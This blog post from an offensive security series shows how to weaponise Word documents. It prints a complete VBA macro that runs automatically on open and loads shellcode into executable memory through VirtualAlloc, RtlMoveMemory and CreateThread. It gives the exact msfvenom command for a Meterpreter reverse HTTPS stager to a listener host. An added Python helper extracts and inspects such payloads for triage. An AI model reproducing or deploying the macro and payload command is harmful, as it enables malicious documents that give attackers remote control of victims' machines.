This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
Office products are among the most widely used productivity tools in the world, which also makes them attractive targets for attackers.
According to Statistica, Office 365 is used by over a million companies worldwide, with over 731,000 of those companies in the United States alone. The United Kingdom is second with approximately 187,000 and Canada third with just over 83,000. In terms of individual users, there are 1.2 billion worldwide.
Most users run the Office applications as native desktop installs on their devices rather than using the browser versions, which are less mature and less feature-rich. When choosing a target for client-side attacks, the data therefore points to the desktop Office applications as the priority.
The evil macro below shows how this can be exploited with VBA.
Code Example
The code below is a shellcode runner written in VBA: a piece of code that places shellcode in memory and executes it from there. The typical approach uses three Win32 APIs from Kernel32.dll:
VirtualAlloc,
RtlMoveMemory,
CreateThread.
VirtualAlloc allocates a region of unmanaged memory that is readable, writable and executable (the flAllocationType value &H3000 is MEM_COMMIT | MEM_RESERVE, and the flProtect value &H40 is PAGE_EXECUTE_READWRITE). The shellcode bytes are then copied into that region, one byte at a time, with RtlMoveMemory.
Finally, CreateThread starts a new thread inside the Word process whose start address is the allocated buffer, so execution jumps straight into the shellcode. Note that an RWX allocation followed by a thread creation, all from a VBA macro, is exactly the sequence endpoint detection products look for; this unobfuscated version is the baseline that the later posts on evasion build on, not something expected to survive in a monitored environment.
' API declarations. PtrSafe and LongPtr keep the declarations valid in both 32-bit and 64-bit Office.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As LongPtr   ' LongPtr so a 64-bit pointer-sized return value cannot raise an Overflow error

    ' Shellcode as an array of byte values, pasted from msfvenom -f vbapplication output (truncated here)
    buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
    ...
    49, 57, 50, 46, 49, 54, 56, 46, 49, 55, 54, 46, 49, 52, 50, 0, 187, 224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, 187, 71, 19, 114, 111, 106, 0, 83, 255, 213) '<SNIP>

    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    ' UBound(buf) is one less than the array length, but VirtualAlloc rounds the size up to a whole page, so the shellcode still fits.
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    ' Copy the shellcode into the RWX region one byte at a time; only the low byte of the Long is copied
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    ' Start a new thread in the Word process with the shellcode buffer as its start address
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

' Word runs Document_Open (the ThisDocument event) and AutoOpen (the auto macro) when the document is opened
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
The Payload
In order to generate the shellcode we need to know the target architecture, and what matters is the bitness of the Word process, not of the operating system. The target runs 64-bit Windows, but Microsoft Word 2016 installs as 32-bit by default, so we generate 32-bit shellcode. Newer Office builds default to 64-bit, so check the bitness under File > Account > About Word before generating: 32-bit shellcode started in a 64-bit process will not execute correctly and will typically crash Word.
We use msfvenom to generate the first stage of a Meterpreter reverse HTTPS shell, formatted as vbapplication so that the output is a ready-to-paste VBA array.
Because the shellcode runs inside the Word process, we set EXITFUNC to "thread" instead of the default "process", so that when the shellcode exits only its own thread terminates rather than the whole Word application.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.64 LPORT=443 EXITFUNC=thread -f vbapplication
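The msfvenom command above produces the Array(...) statement pasted into the macro, and an analyst looking at such a document has to do the reverse. The Python helper below is an added example written for this page; it is not part of the original post, of Metasploit or of Microsoft's tooling. It folds VBA line continuations, pulls the byte values out of a buf = Array(...) literal so the shellcode can be inspected offline (the tail of the array in the listing decodes to the ASCII string 192.168.176.142, the listener host embedded in that stager, which does not match the LHOST in the msfvenom command above), flags a VirtualAlloc call that passes &H40 (PAGE_EXECUTE_READWRITE) literally, and re-emits bytes in the 80-values-per-line layout of the listing while enforcing VBA's limit of 24 line continuations per statement. The embedded macro fragment (SAMPLE_MACRO) is constructed from the head and tail bytes shown on the page and is not a complete payload.

```python
import re
from typing import List

# Constructed sample macro: the head and tail of the Array(...) statement
# quoted in the listing above, joined with a single VBA line continuation.
# The middle of the real stager is omitted on the page, so this is not
# runnable shellcode, only a fragment for exercising the parser.
SAMPLE_MACRO = """Function MyMacro()
Dim buf As Variant
buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, _
49, 57, 50, 46, 49, 54, 56, 46, 49, 55, 54, 46, 49, 52, 50, 0, 187, 224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, 187, 71, 19, 114, 111, 106, 0, 83, 255, 213)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
End Function
"""

# VBA rejects a statement that uses more than 24 " _" line continuations.
MAX_CONTINUATIONS = 24


def join_continuations(vba: str) -> str:
    """Fold VBA ' _' line continuations so every logical statement is one line."""
    return re.sub(r"[ \t]_\r?\n[ \t]*", " ", vba)


def extract_shellcode(vba: str) -> bytes:
    """Return the byte values of the first Array(...) literal in a macro."""
    match = re.search(r"Array\(([^()]*)\)", join_continuations(vba))
    if match is None:
        raise ValueError("no Array(...) literal found")
    values = [int(v) for v in re.findall(r"\d+", match.group(1))]
    if any(v > 255 for v in values):
        raise ValueError("array element outside 0..255, not a byte array")
    return bytes(values)


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII: C2 hosts, DLL names and URIs survive in stagers."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, data)]


def allocates_rwx(vba: str) -> bool:
    """True if a VirtualAlloc call passes &H40 (PAGE_EXECUTE_READWRITE) literally.

    This is a literal check only: a macro that computes the constant or writes
    it as decimal 64 slips past it, which is what later evasion work relies on.
    """
    folded = join_continuations(vba)
    return re.search(r"VirtualAlloc\s*\(.*?&H40\b", folded, re.IGNORECASE) is not None


def to_vba_array(data: bytes, name: str = "buf", per_line: int = 80) -> str:
    """Emit 'name = Array(...)' in the 80-values-per-line layout of the listing."""
    chunks = [data[i:i + per_line] for i in range(0, len(data), per_line)]
    continuations = len(chunks) - 1
    if continuations > MAX_CONTINUATIONS:
        raise ValueError(
            f"{continuations} line continuations exceed VBA's limit of "
            f"{MAX_CONTINUATIONS}; split the payload across several arrays")
    lines = [", ".join(str(b) for b in chunk) for chunk in chunks]
    body = ", _\n".join(lines)
    return f"{name} = Array({body})"


if __name__ == "__main__":
    code = extract_shellcode(SAMPLE_MACRO)
    print(f"{len(code)} bytes recovered")
    print("strings:", printable_strings(code))
    print("RWX allocation:", allocates_rwx(SAMPLE_MACRO))
    print(to_vba_array(code[:10]))
```

The extractor is the first step of triage: the recovered bytes go to a disassembler or an emulator, and the printable strings alone usually give up the listener. The encoder makes the size constraint visible: at 80 values per line, 24 continuations cap a single Array statement at 1920 bytes, which is why a staged payload fits in one statement while a stageless one has to be split.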